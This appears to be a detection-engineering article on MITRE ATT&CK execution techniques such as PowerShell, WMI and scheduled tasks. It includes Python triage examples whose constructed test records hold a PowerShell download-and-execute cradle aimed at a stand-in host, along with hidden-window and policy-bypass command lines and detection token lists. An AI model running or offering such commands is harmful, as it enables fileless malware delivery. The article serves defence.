# Execution Techniques (MITRE ATT&CK TA0002)
## Definition
Execution is the adversary's second move. After gaining initial access, attackers must run their malicious code within the target environment to achieve any meaningful objective. MITRE ATT&CK categorizes this as Tactic TA0002, and it encompasses every method an attacker uses to cause malicious code to execute on a local or remote system.
Execution does not happen in isolation. It is almost always paired with another tactic: persistence mechanisms use execution to run code at startup, lateral movement techniques use execution to operate on remote systems, and privilege escalation relies on execution to trigger exploits. Understanding execution as a tactic means understanding the connective tissue that links every other phase of an attack together.
The most important characteristic of modern execution techniques is their preference for legitimacy. Attackers overwhelmingly favor techniques that abuse tools and interpreters already present on the target system, a strategy broadly called "living off the land" (LotL). When an attacker uses PowerShell, WMI, or the Windows Task Scheduler to execute code, those processes appear legitimate to operating systems and security tools that lack deep behavioral analysis. The malicious intent is hidden inside a trusted host process.
This makes execution one of the highest-signal tactical categories for detection engineers. The processes involved are known. The event logs are available. The behavioral anomalies are well-documented. Organizations that invest in execution-layer telemetry can detect attacks that evade perimeter and signature-based controls entirely.
## How It Works
### Command and Scripting Interpreter (T1059)
T1059 is the most widely exploited execution technique by volume. It covers every built-in scripting capability present on modern operating systems. Attackers do not need to introduce new executables when the target already runs a full-featured scripting engine by default.
PowerShell (T1059.001) is the dominant sub-technique across all threat actor categories, from commodity malware operators to nation-state groups. PowerShell's appeal is its power: it provides direct access to the .NET framework, the Windows API, and the filesystem, all through a built-in interpreter that is trusted by the operating system. Attackers use it for fileless execution (loading shellcode or assemblies directly into memory without touching disk), for downloading and executing remote payloads, and for interacting with Active Directory and remote systems through built-in cmdlets.
The fileless execution path is particularly significant. A PowerShell command can download a malicious payload from an attacker-controlled server, load it into memory as a .NET assembly, and execute it without writing a single file to disk. Traditional antivirus products that scan the filesystem see nothing to flag. Without script block logging enabled, the command itself is never recorded.
Defense evasion layered on top of PowerShell execution includes:
- Base64 encoding, to obscure command content from simple string matching.
- AMSI bypass techniques: the Antimalware Scan Interface is the primary mechanism by which security tools inspect PowerShell commands at runtime, and several bypass methods exist to disable it before running malicious code.
- The PowerShell downgrade attack: explicitly invoking PowerShell version 2.0, which predates script block logging and AMSI, so that the execution runs outside the logging framework.
Windows Command Shell (T1059.003) covers cmd.exe and batch file execution. Though less capable than PowerShell, cmd.exe is present on every Windows system and is often allowed by application control policies. Batch files (.bat, .cmd) are commonly delivered as phishing attachments or dropped as secondary payloads.
Unix Shell (T1059.004) is the Linux and macOS equivalent: bash, sh, zsh, and other POSIX shells. Shell scripts are heavily used in attacks against Linux servers and cloud infrastructure. Cron jobs executing shell scripts combine T1059.004 with T1053 (scheduled tasks) for persistence-plus-execution in a single technique.
Visual Basic (T1059.005) encompasses VBScript (.vbs files) and macros embedded in Office documents (.docm, .xlsm). Office macros were the dominant phishing payload delivery mechanism for over a decade before Microsoft's 2022 decision to block macros from internet-sourced files by default. Despite this control, macros remain effective against organizations that have not enforced the policy or that are targeted through network shares rather than email attachments.
JavaScript (T1059.007) covers JavaScript executed through Windows Script Host via wscript.exe and cscript.exe. JavaScript payloads are frequently delivered as .js or .jse files in phishing emails and are often used as droppers that download a more capable second-stage payload.
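As an added example (not code from the page or from MITRE), the following Python triage routine runs over constructed 4688-style process-creation records, which presupposes the command-line argument field discussed under Technical Details: it decodes an encoded command and checks the decoded text for download-and-execute indicators, flags a version-2 downgrade, an Office parent spawning an interpreter, and Windows Script Host running a .js/.jse file. The record field names, file paths and the example.invalid URL are constructed.

```python
import base64
import re

# Parents that should rarely spawn a script interpreter (user execution leading to T1059).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Tokens in a decoded script block that point at the fileless download-and-run path.
RISKY_TOKENS = ("downloadstring", "frombase64string", "reflection.assembly", "invoke-expression")
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
DOWNGRADE_RE = re.compile(r"-(?:v|version)\s+2(?:\.0)?\b", re.I)

def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload (base64 of UTF-16LE text) or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(event):
    """Return (technique, reason) findings for one 4688-style record held in a dict."""
    findings = []
    image = event["new_process"].rsplit("\\", 1)[-1].lower()
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    cmd = event["cmdline"]
    if image in INTERPRETERS and parent in OFFICE_PARENTS:
        findings.append(("T1204.002", f"{parent} spawned {image}"))
    if image in ("powershell.exe", "pwsh.exe"):
        if DOWNGRADE_RE.search(cmd):
            findings.append(("T1059.001", "PowerShell v2 downgrade requested"))
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hits = [t for t in RISKY_TOKENS if t in decoded.lower()]
            findings.append(("T1059.001", f"encoded command; decoded indicators: {hits}"))
    if image in ("wscript.exe", "cscript.exe") and re.search(r"\.jse?\b", cmd, re.I):
        findings.append(("T1059.007", "Windows Script Host running a .js/.jse file"))
    return findings

# Constructed sample records (not real telemetry); the payload is a textbook download cradle.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PAYLOAD = 'Invoke-Expression (New-Object Net.WebClient).DownloadString("http://example.invalid/x")'
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"new_process": PS, "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": f"powershell.exe -NoP -W Hidden -Enc {ENCODED}"},
    {"new_process": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -Version 2 -ExecutionPolicy Bypass -File C:\Users\Public\u.ps1"},
    {"new_process": r"C:\Windows\System32\wscript.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\invoice.jse"'},
    {"new_process": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"},
]
```

Run `triage` over each record; the last, benign record yields no findings, which is the baseline a rule should stay quiet on.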
### Windows Management Instrumentation (T1047)
WMI is one of the most powerful administrative frameworks built into Windows and one of the most heavily abused execution techniques at the advanced threat actor level. WMI provides remote execution capability, a persistent event subscription system, and access to virtually every aspect of Windows system state, all through infrastructure that is trusted, built-in, and enabled by default.
Attackers use WMI for two primary execution purposes: running commands on remote systems (using Win32_Process.Create via DCOM), and establishing WMI event subscriptions that fire on system events (startup, process creation, scheduled intervals) to achieve persistence with execution. The event subscription approach is particularly dangerous because the persistence mechanism lives entirely within the WMI repository, not on the filesystem, making it invisible to file-based forensics.
WMI abuse is difficult to detect without specific telemetry. The wmic.exe binary and the underlying WMI service are legitimate and expected. Detection requires WMI activity logging (Microsoft-Windows-WMI-Activity/Operational event log) or endpoint detection and response (EDR) tools that instrument WMI at the API level.
### Scheduled Task/Job (T1053)
Scheduled tasks (T1053.005 on Windows) and systemd timers (T1053.006 on Linux) serve dual purposes in the attack lifecycle: they provide both execution and persistence in a single technique. An attacker who creates a scheduled task that runs every 60 minutes has also established a mechanism to re-execute their payload even after detection and remediation of the initial infection vector.
Windows scheduled tasks created by attackers often appear in non-standard locations (not the root \Microsoft\Windows\ tree, but under custom folder names), use obscure or system-like names to blend with legitimate tasks, and reference executables or scripts in user-writable directories or temporary folders. The task creation event (Windows Event ID 4698) and task modification event (Event ID 4702) are high-fidelity detection signals that should be monitored in every environment.
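As an added example (not from the page), the Python below applies the three checks just described to a 4698 record: the task name and the task XML that the event carries in its TaskContent field. It flags registration outside the \Microsoft\Windows\ tree, an action whose command or arguments sit in a user-writable path, an action that launches a script interpreter, and a repeating trigger. The two task definitions are constructed samples; the XML namespace is the Task Scheduler schema namespace.

```python
import re
import xml.etree.ElementTree as ET

# Task Scheduler XML namespace used in the TaskContent field of event 4698.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
USER_WRITABLE = re.compile(r"\\(users|temp|appdata|programdata|public)\\", re.I)
INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "wscript", "cscript")

def triage_task(task_name, task_xml):
    """Return findings for one 4698 record: its TaskName and TaskContent XML."""
    root = ET.fromstring(task_xml)
    findings = []
    if not task_name.lower().startswith("\\microsoft\\windows\\"):
        findings.append("registered outside the \\Microsoft\\Windows\\ tree")
    for action in root.findall(".//t:Exec", NS):
        cmd = action.findtext("t:Command", "", NS).strip()
        args = action.findtext("t:Arguments", "", NS).strip()
        if USER_WRITABLE.search(cmd) or USER_WRITABLE.search(args):
            findings.append(f"action uses a user-writable path: {cmd} {args}".rstrip())
        if any(tok in cmd.lower() for tok in INTERPRETERS):
            findings.append(f"action launches a script interpreter: {cmd}")
    for interval in root.findall(".//t:Repetition/t:Interval", NS):
        findings.append(f"repeats every {interval.text}")
    return findings

# Constructed samples, not captured events.
SUSPICIOUS_NAME = r"\Updates\SystemUpdateCheck"
SUSPICIOUS_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger>
    <StartBoundary>2024-01-01T00:00:00</StartBoundary>
    <Repetition><Interval>PT60M</Interval></Repetition>
  </TimeTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-NoP -W Hidden -File C:\\Users\\Public\\update.ps1</Arguments>
  </Exec></Actions>
</Task>"""
BENIGN_NAME = r"\Microsoft\Windows\Example\NightlyDefrag"
BENIGN_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger>
    <StartBoundary>2024-01-01T02:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
  </CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\\Windows\\System32\\defrag.exe</Command><Arguments>-c</Arguments>
  </Exec></Actions>
</Task>"""
```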
### User Execution (T1204)
User execution techniques shift the execution responsibility to the victim. The attacker crafts content designed to trick a user into taking an action that results in code execution.
T1204.001 (Malicious Link) covers clicks that initiate a download followed by execution, or that navigate the browser to an exploit page. T1204.002 (Malicious File) covers every scenario in which the user opens or runs a file delivered through phishing, a download, or a removable media device. Malicious files span a wide range of formats: Office documents with macros, LNK shortcut files, ISO and IMG disk images (used to bypass Mark-of-the-Web, the Windows mechanism that flags internet-sourced files), and executables masquerading as documents through double extensions or misleading icons.
User execution is not a failure of technology alone. It is the technique that adversaries choose when technical controls make automated execution difficult. Security awareness training, email gateway sandboxing, and application control policies that prevent execution of user-downloaded content all reduce T1204 exposure.
### Inter-Process Communication (T1559)
T1559 covers execution through legitimate inter-process communication mechanisms that applications expose as design features. Dynamic Data Exchange (DDE) is a legacy protocol that allows one application to request data from or invoke commands in another. DDE execution in Office documents was widely exploited before Microsoft disabled it by default. Component Object Model (COM) objects expose programmatic interfaces that attackers use to invoke execution within trusted host processes, bypassing application control policies that allow those hosts.
### System Services (T1569)
T1569.002 (Service Execution) involves creating or modifying a Windows service to execute attacker-controlled code. Services run as SYSTEM by default, making service execution a high-privilege execution technique. Attackers create services with innocuous names, register attacker-controlled executables as the service binary, and start the service. The service entry persists across reboots, combining execution with persistence.
## Why It Matters
### Execution Is the Point of No Return
Every tactic before execution (initial access, resource development, reconnaissance) is preparatory. Every tactic after execution (persistence, privilege escalation, lateral movement, exfiltration) is consequential. Execution is the moment the attack becomes active inside the environment. Organizations that detect execution-phase activity early, before privilege escalation and lateral movement are complete, prevent the vast majority of breach impact.
The Ponemon Institute's cost of a data breach research consistently shows that organizations that contain breaches within 30 days spend approximately $1 million less per incident than those that do not. Execution-layer detection is the primary mechanism for early containment: catch the attacker running code before they establish deep persistence and move laterally.
### The Living-off-the-Land Problem
The shift toward living-off-the-land execution (LOLBins: binaries already present on the system, used for malicious purposes) is the single most significant change in attacker technique over the past decade. A 2024 CrowdStrike threat intelligence report noted that malware-free attacks now account for the majority of intrusion activity it tracks. Attackers who use only built-in tools do not need to deliver executables that signature-based antivirus can detect.
This fundamentally changes the detection problem. Organizations relying on signature detection alone have no effective control against T1059.001 (PowerShell), T1047 (WMI), or T1053 (scheduled tasks) when those techniques are used by skilled attackers. Behavioral analytics, command-line argument analysis, and parent-child process relationship monitoring become the primary detection mechanisms.
### Detection Opportunity Density
Execution techniques generate rich telemetry when logging is correctly configured. Every sub-technique under T1059 produces process creation events. PowerShell produces script block logs. WMI produces activity logs. Scheduled tasks produce creation and modification events. Service creation produces System log events. This telemetry density makes execution one of the highest-detection-opportunity tactical categories available to security operations teams.
## Technical Details
### PowerShell Logging Configuration
Three categories of PowerShell logging must be enabled to achieve meaningful visibility:
- Script Block Logging (Windows Event ID 4104): logs the full content of every script block executed, including dynamically generated code. This captures encoded and obfuscated payloads in their decoded form at execution time. Configured via Group Policy under Windows PowerShell.
- Module Logging (Event ID 4103): logs pipeline execution events, including the commands and parameters used. Less granular than script block logging but provides command-level visibility.
- Transcription Logging: logs a text transcript of every PowerShell session to a file on disk. Useful for forensics but less useful for real-time detection than event log-based logging.
Constrained Language Mode (CLM) restricts PowerShell to a limited set of types and commands, preventing many common attack techniques that rely on .NET interop and Windows API access. CLM is enforced by Windows Defender Application Control (WDAC) or AppLocker policies.
### Key Windows Event IDs for Execution Detection

| Event ID | Log | Description |
|----------|-----|-------------|
| 4104 | PowerShell/Operational | Script block execution (primary PS detection signal) |
| 4688 | Security | Process creation with command-line arguments |
| 4698 | Security | Scheduled task created |
| 4702 | Security | Scheduled task modified |
| 7045 | System | New service installed |
| WMI Activity | Microsoft-Windows-WMI-Activity/Operational | WMI query and subscription activity |
Process creation logging (Event ID 4688) must be configured to include command-line arguments, which is not enabled by default. Without command-line logging, the process creation event shows powershell.exe started but does not show what it was told to run.
### AMSI and Its Bypass
The Antimalware Scan Interface (AMSI) is a Windows API that allows security products to scan content at runtime, specifically targeting script-based execution that occurs in memory rather than from files. When PowerShell, JScript, or VBScript code is about to run, AMSI passes the script content to the registered security providers before it executes.
AMSI bypass techniques work by patching the AmsiScanBuffer function in memory to return a "clean" result regardless of content, or by corrupting the AMSI context structure. Detection of AMSI bypass attempts is possible through behavioral monitoring of memory write operations to the amsi.dll module and through monitoring for specific byte patterns associated with known bypass implementations.
## CDA Perspective
### TID PDI Detection Coverage and Execution Mapping
Predictive Defense Intelligence (PDI) is CDA's TID-domain methodology: "See the threat before it sees you." At the execution layer, PDI manifests as pre-built detection coverage that maps every significant execution sub-technique to specific detection rules, primarily expressed as Sigma rules for SIEM deployment.
CDA's TID detection engineering work maintains execution technique coverage across the full T1059 sub-technique tree, T1047, T1053, T1204, and T1569. Each technique maps to one or more Sigma rules, each rule maps to required log sources, and each log source maps to a configuration requirement. When a log source is missing (PowerShell script block logging not enabled, process creation command-line arguments not captured), the coverage gap is surfaced as a detection gap in the Shield assessment.
The practical consequence: an organization that has deployed a SIEM but has not enabled PowerShell script block logging has a blind spot for the highest-volume execution technique in the ATT&CK matrix. PDI identifies that gap before an attacker exploits it.
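A small coverage model, added here as an example rather than CDA's own tooling, walks the technique-to-rule-to-log-source-to-configuration chain described above and reports, for a given set of enabled log sources, which techniques are blind, which are only partially covered, and which configuration change would fix the cheapest blocked rule. The rule names and source descriptions are constructed illustrations; the scenario in the test is the one above, a SIEM receiving 4688 but no script block logging.

```python
# Constructed coverage model (hypothetical rule names) linking technique -> rule -> log source
# -> configuration requirement, so that a missing source surfaces as a detection gap.
LOG_SOURCES = {
    "ps_scriptblock": "PowerShell/Operational 4104: enable Script Block Logging",
    "process_cmdline": "Security 4688: audit process creation with command-line arguments",
    "task_events": "Security 4698/4702: scheduled task creation and modification",
    "wmi_activity": "Microsoft-Windows-WMI-Activity/Operational: WMI activity logging",
    "service_install": "System 7045: service installation events",
}
RULES = [  # each rule fires only when every source it needs is being collected
    ("ps_encoded_command", "T1059.001", {"process_cmdline"}),
    ("ps_scriptblock_download_cradle", "T1059.001", {"ps_scriptblock"}),
    ("ps_version_downgrade", "T1059.001", {"process_cmdline"}),
    ("office_spawns_interpreter", "T1204.002", {"process_cmdline"}),
    ("wmi_remote_process_create", "T1047", {"wmi_activity"}),
    ("wmi_event_subscription", "T1047", {"wmi_activity"}),
    ("task_in_user_writable_path", "T1053.005", {"task_events"}),
    ("service_binary_in_user_writable_path", "T1569.002", {"service_install", "process_cmdline"}),
]

def coverage(enabled_sources):
    """Per technique: rules that can fire, and blocked rules with the sources they lack."""
    enabled = set(enabled_sources)
    report = {}
    for rule, technique, needs in RULES:
        entry = report.setdefault(technique, {"live": [], "blocked": []})
        missing = sorted(needs - enabled)
        if missing:
            entry["blocked"].append((rule, missing))
        else:
            entry["live"].append(rule)
    return report

def detection_gaps(enabled_sources):
    """Map each technique to (status, fix): status is covered, partial or blind;
    fix lists the configuration work for the blocked rule needing the fewest sources."""
    gaps = {}
    for technique, entry in coverage(enabled_sources).items():
        if not entry["blocked"]:
            gaps[technique] = ("covered", [])
            continue
        cheapest = min(entry["blocked"], key=lambda b: len(b[1]))[1]
        status = "partial" if entry["live"] else "blind"
        gaps[technique] = (status, [LOG_SOURCES[s] for s in cheapest])
    return gaps
```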
### Execution Defense in the Concentric Model
Execution sits primarily within TID (Threat Intelligence and Defense), but the defensive controls span multiple PDM domains. Endpoint controls (EDR deployment, application control policy enforcement) are an SPH (Security Posture and Hygiene) responsibility under the Autonomous Posture Command (APC) methodology. Identity controls that limit which users can install services or create scheduled tasks are an IAT (Identity Access and Trust) responsibility under ZPA. Vulnerability management that prevents exploitation-based execution is a VSD responsibility under CSR.
This is why The Shield assessment evaluates execution-layer detection as a multi-domain problem. TID provides the detection capability. SPH provides the endpoint hardening that makes many execution techniques fail before detection is even needed. IAT provides the least-privilege controls that constrain what executed code can do. A mature execution defense posture requires all three domains working simultaneously.
## Key Takeaways
- Execution (MITRE ATT&CK TA0002) is the tactic that activates code inside the target environment, making it the pivotal point in every attack chain. Early detection during execution significantly limits breach impact.
- T1059 (Command and Scripting Interpreter) is the dominant execution technique category. PowerShell (T1059.001) is the most abused sub-technique across all threat actor types, from commodity malware to nation-state groups.
- Living-off-the-land execution using built-in Windows tools (PowerShell, WMI, scheduled tasks, cmd.exe) bypasses signature-based detection. Behavioral analytics and proper logging configuration are the only effective detection mechanisms.
- PowerShell script block logging (Event ID 4104), process creation with command-line arguments (Event ID 4688), and scheduled task creation (Event ID 4698) are the three highest-priority log sources for execution detection.
- AMSI bypass and PowerShell downgrade attacks specifically target the logging and scanning mechanisms defenders rely on. Detection engineering must account for both the primary technique and its evasion variants.
- CDA's TID PDI methodology maps execution sub-techniques to specific Sigma detection rules and log source requirements, surfacing detection gaps before they become blind spots.
## Related Articles
- Living Off the Land Techniques [TID-LOTL-001]
- Initial Access Techniques [TID-IA-001]
- Detection Engineering [TID-DE-001]
- Fileless Malware [TID-FM-001]
- YARA Rules for Malware Detection [TID-YARA-001]
- SOC Metrics and KPIs [TID-SOC-001]
## Sources
MITRE Corporation. "Execution (TA0002)." MITRE ATT&CK, 2024. https://attack.mitre.org/tactics/TA0002/
MITRE Corporation. "Command and Scripting Interpreter (T1059)." MITRE ATT&CK, 2024. https://attack.mitre.org/techniques/T1059/
Microsoft. "About Script Block Logging." Microsoft PowerShell Documentation, 2024. https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows
CrowdStrike. "2024 Global Threat Report." CrowdStrike, 2024. https://www.crowdstrike.com/global-threat-report/
Ponemon Institute. "Cost of a Data Breach Report 2024." IBM Security, 2024. https://www.ibm.com/reports/data-breach
Mandiant. "M-Trends 2024 Special Report." Google Cloud, 2024. https://www.mandiant.com/m-trends
Lee, R. and Bianco, D. "The Pyramid of Pain." Dragos, 2014. https://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html
CDA, LLC. "Predictive Defense Intelligence (PDI) Methodology Reference." CDA Canon, 2026.